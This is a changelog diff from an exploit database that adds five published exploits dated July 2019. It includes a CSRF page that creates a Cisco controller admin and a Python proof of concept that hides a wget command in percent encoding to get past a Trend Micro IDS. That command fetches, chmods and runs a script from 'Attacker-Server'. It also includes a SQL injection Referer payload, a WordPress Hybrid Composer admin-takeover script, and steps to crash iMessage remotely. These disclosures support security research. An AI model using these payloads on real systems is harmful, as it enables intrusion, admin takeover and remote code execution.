DB: 2019-07-25

5 changes to exploits/shellcodes

Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read

Trend Micro Deep Discovery Inspector IDS - Security Bypass
NoviSmart CMS - SQL injection
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery
WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions

exploits/hardware/webapps/47153.html

@@ -0,0 +1,34 @@
+# Product : Cisco Wireless Controller
+# Version : 3.6.10E (last version)
+# Date: 23.07.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Mehmet Önder Key
+# Website: htts://cloudvist.com
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+# Tested On : Win10 & KaliLinux
+
+Add Admin CSRF Payload @Cisco Wireless Controller
+---------------
+<html>
+  <body>
+    <form action="http://IP/security/cfgSecurityAAAUsersCreate
+<http://192.168.115.83/security/cfgSecurityAAAUsersCreate>" method="POST">
+      <input type="hidden" name="username" value="secretadmin" />
+      <input type="hidden" name="privilege" value="15" />
+      <input type="hidden" name="password" value="K3Y" />
+      <input type="hidden" name="description" value="CSRF" />
+      <input type="hidden" name="type" value="lobby-admin" />
+      <input type="hidden" name="cfnpassword" value="K3Y" />
+      <input type="hidden" name="yearlife" value="2013" />
+      <input type="hidden" name="hourlife" value="16" />
+      <input type="hidden" name="monthlife" value="7" />
+      <input type="hidden" name="minlife" value="17" />
+      <input type="hidden" name="datelife" value="16" />
+      <input type="hidden" name="seclife" value="0" />
+      <input type="submit" value="submit" />
+    </form>
+  </body>
+</html>

exploits/multiple/remote/47155.txt

@@ -0,0 +1,104 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
+[+] ISR: Apparition Security         
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Deep Discovery Inspector
+
+Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks
+moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker
+activities that are invisible to standard security defenses.
+
+
+
+[Vulnerability Type]
+Percent Encoding IDS Bypass
+
+
+[CVE Reference]
+Vendor decided not to release a CVE
+
+
+[Security Issue]
+Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high.
+Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on.
+
+However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and
+will not get flagged or alerted on and may still be processed on the target system.
+
+e.g.
+
+DDI RULE 2452 
+https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452
+
+Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74.
+That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command.
+
+Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for
+percent encoded HEX character payload values. 
+
+
+[Exploit/POC]
+from socket import *
+#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
+#Discovery: hyp3rlinx - ApparitionSec
+#Apparition Security
+#Firewall Rule Bypass
+
+IP = raw_input("[+] Trend Micro IDS")
+PORT = 80
+
+payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a"
+req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"
+
+s=socket(AF_INET, SOCK_STREAM)
+s.connect((IP, PORT))
+s.send(req)
+res=""
+
+while True:
+    res = s.recv(512)
+    print res
+    if res=="\n" or "</html>":
+        break
+
+s.close()
+
+
+#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.
+
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+
+[Disclosure Timeline]
+Vendor Notification: May 14, 2019
+Vendor confirmed the IDS Bypass: May 20, 2019
+Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
+July 23, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/php/webapps/47152.txt

@@ -0,0 +1,26 @@
+# Exploit Title: NoviSmart CMS SQL injection
+# Date: 23.7.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: http://www.novismart.com/
+# Version: Every version
+# CVE : CWE-89
+
+Vulnerable parameter: Referer (HTTP Header field)
+
+[GET Request]
+
+GET / HTTP/1.1
+Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Client-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-Host: localhost
+Accept-Language: en
+Via: 1.1 wa.www.test.com
+Origin: http://www.test.com/
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1
+Host: host
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+Accept: */*

exploits/php/webapps/47154.py

@@ -0,0 +1,62 @@
+# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
+# Date: 2019-07-24
+# Vendor Homepage: http://wordpress.framework-y.com
+# Software Link:  http://wordpress.framework-y.com/hybrid-composer/
+# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
+# Affected version: <= 1.4.6
+# Researcher: rootetsy
+# Exploit Author: yasin
+# Tested on: Linux
+# Vulnerability discovered by rootetsy
+
+ 
+# Summary
+The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.
+
+# Description
+A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
+index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.
+
+
+# Usage: python exploit.py 
+
+
+
+###########################################################
+import httplib, urllib
+import sys 
+import random
+# pip install httplib urllib random
+
+site = raw_input("[+] Target: ")
+url = "/wp-admin/admin-ajax.php"
+username = "user-%d" % random.randrange(1000000, 3000000)
+email = raw_input("[+] E-mail: ")
+  
+def ChangeOption(site, url, option_name, content):
+    params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+    conn.request("POST", url, params, headers)
+    response = conn.getresponse()
+    data = response.read()
+    conn.close()
+registration_url= "/wp-login.php"
+def AdminTakeover(site, registration_url, user_login, user_email):
+    params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
+    conn.request("POST", registration_url, params, headers)
+    response = conn.getresponse()
+    data = response.read()
+    conn.close()
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")      
+print "[+] Registering new admin user"
+AdminTakeover(site, registration_url, username, email)
+print "[+] Check your email for password: " + username + "[" + email + "]"
+ChangeOption(site, url, "users_can_register", "0")
+ChangeOption(site, url, "default_role", "subscriber") 
+
+
+###########################################################

exploits/watchos/dos/47158.txt

@@ -0,0 +1,18 @@
+The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method [ETTapMessage initWithArchiveData:] checks that the points array is twice as long as the deltas array, but only checks that the colors array is longer than eight bytes, even though a color is needed for every point-delta pair that is processed.
+
+To reproduce the issue with the files in tapcrash.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "FULL PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+This will lead to a crash in SpringBoard requiring no user interaction.
+
+I've also attached a crash dump and ETencode.m, which is the file that was used to generate the obj file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip

files_exploits.csv

@@ -6512,6 +6512,7 @@ id,file,description,date,author,type,platform,port
 47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
 47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
 47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux,
+47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17564,6 +17565,7 @@ id,file,description,date,author,type,platform,port
 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
+47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41528,3 +41530,6 @@ id,file,description,date,author,type,platform,port
 47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
 47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,
 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,
+47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php,
+47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware,
+47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,